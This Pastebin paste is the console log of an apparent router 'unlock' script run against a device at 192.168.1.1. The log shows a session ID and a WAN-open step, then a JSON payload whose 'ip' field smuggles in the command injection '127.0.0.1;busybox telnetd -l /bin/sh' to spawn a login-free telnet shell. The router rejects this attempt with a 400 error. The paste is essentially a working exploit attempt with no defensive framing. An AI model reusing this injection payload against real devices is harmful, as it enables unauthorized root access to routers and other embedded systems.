Advertisement
njunwa1

Untitled

Jun 9th, 2025
168
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Connecting to router: 192.168.1.1
  2. Using session ID: 77c3a3575455f65e03a21e4c7c4e917768e0c650ef0e2736dc7d97b7356e8ac8
  3. StartInfo
  4. Response: {"success":true,"cmd":207,  ....}
  5.  
  6. WAN Open successful (sync)
  7. Response: {"success":true,"cmd":302,"message":""}
  8.  
  9. Starting Unlock command
  10. Sending injection payload:
  11. {
  12.   "method": "POST",
  13.   "subcmd": 6,
  14.   "success": true,
  15.   "ip": "127.0.0.1;busybox telnetd -l /bin/sh",
  16.   "cmd": 172,
  17.   "sessionId": "77c3a3575455f65e03a21e4c7c4e917768e0c650ef0e2736dc7d97b7356e8ac8",
  18.   "enabled": "1"
  19. }
  20. Request failed: 400 Bad Request
  21. HTTP Response: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  22.  
  23. <html>
  24.  
  25.   <head>
  26.     <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
  27.     <title>400 Bad Request</title>
  28.   </head>
  29.  
  30.   <body bgcolor="#cc9999" text="#000000" link="#2020ff" vlink="#4040cc">
  31.  
  32.     <h4>400 Bad Request</h4>
  33. Can't parse request!
  34.    <hr>
  35.  
  36.    <address><a href="http://www.acme.com/software/mini_httpd/"></a></address>
  37.  
  38.  </body>
  39.  
  40. </html>
  41.  
  42. ✗ HTTP request failed
  43.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement